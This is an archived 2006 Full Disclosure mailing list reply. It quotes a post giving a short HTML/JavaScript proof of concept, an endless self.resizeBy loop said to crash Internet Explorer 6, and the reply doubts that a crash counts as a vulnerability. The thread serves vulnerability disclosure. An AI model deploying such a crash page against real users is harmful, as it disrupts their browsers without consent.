Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Internet Explorer Ver 6.0.2800.1106 vulnerability

From: <0x80 () hush ai>
Date: Sun, 28 May 2006 18:05:50 -0700
How is a simple crash a vulnerability?  you can make IE crash 
99999999 different ways.  The trick is making it run your code.


On Fri, 26 May 2006 05:49:39 -0700 r k <kgp.143 () gmail com> wrote:

Hi All,


IE Ver 6.0.2800.1106 crashs when we try to resizeby() in the html 
page.

the following is the code

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++



+

<html>
<head>
<title>Internet Explorer Ver 6.0.2800.1106</title>
</head>
<body>
<script>
 var wwidth = (window.innerWidth)?window.innerWidth: 
((document.all
)?document.body.offsetWidth:null);

 while (wwidth)
 {
self.resizeBy(-999999, -1);
 }

</script>

</body>
</html>

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

tested on windows 2000,windows XP



thank you

antar




Concerned about your privacy? Instantly send FREE secure email, no account required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: